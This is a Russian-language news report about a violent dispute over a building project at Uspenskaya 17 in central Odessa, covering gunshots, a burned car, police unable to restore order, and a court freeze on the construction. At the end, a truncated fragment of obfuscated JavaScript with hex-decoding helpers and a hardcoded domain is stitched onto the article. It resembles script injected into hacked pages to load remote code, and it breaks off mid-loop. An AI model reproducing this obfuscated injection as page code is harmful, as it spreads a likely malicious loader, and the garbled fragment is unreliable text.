Конфликт на Успенской: в центре Одессы сожгли машину «фото»

Конфликт на Успенской: в центре Одессы сожгли машину

 

g-1-76262-1

фото: pablic.net

Как сообщает корреспондент Украинской Службы Информации, в ходе аппаратного совещания в мэрии стало известно, что в последние дни на Успенской, 17 звучали выстрелы, а проверяющих на территорию стройки не пустили.

Часть забора снесли, но проверить декларацию не удалось. По декларации реконструкция в жилой дом, но зайти не смогли мы на место стройки. Сегодня ночью горела машина, мы в центре города слышим выстрелы. В ситуации нужна помощь полиции, – отметил заместитель руководителя Приморской райадминистрации Марат Королев.

По его словам, автомобиль, который принадлежал главе ОСМД дома на Успенской, 17, сожгли в переулке Чайковского.

Также выяснилось, что пять нарядов полиции не смогли навести порядок в проблемной зоне несколько дней назад. Сейчас ситуация на месте конфликта остается напряженная: интересы обеих сторон контролируют разные охранные структуры, которые стоят на месте.

Напомним, что жильцы пятиэтажного старинного дома на улице Успенской, 17 выступают против строительства новой двухэтажки с мансардой в глубине двора. Там разрушили старое, заброшенное одноэтажное строение.

Стройплощадку оградили железным забором и начали подготовку к возведению нового здания. Глава ОСМД дома Евгений Коган подал против застройщиков –Григория и Татьяны Грабовых иск в Приморский суд. Он потребовал признать стройку незаконной, так как она нарушает первоначальное целевое назначение объекта и может негативно сказаться на состоянии находящегося рядом жилого дома.

Судья Сергей Погребной 1 февраля частично удовлетворил иск и постановил заморозить стройку до окончания разбирательства в этом деле.

 

Как сообщала USIonline.com, жильцы старого жилфонда взбунтовались против новостроя во дворе.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e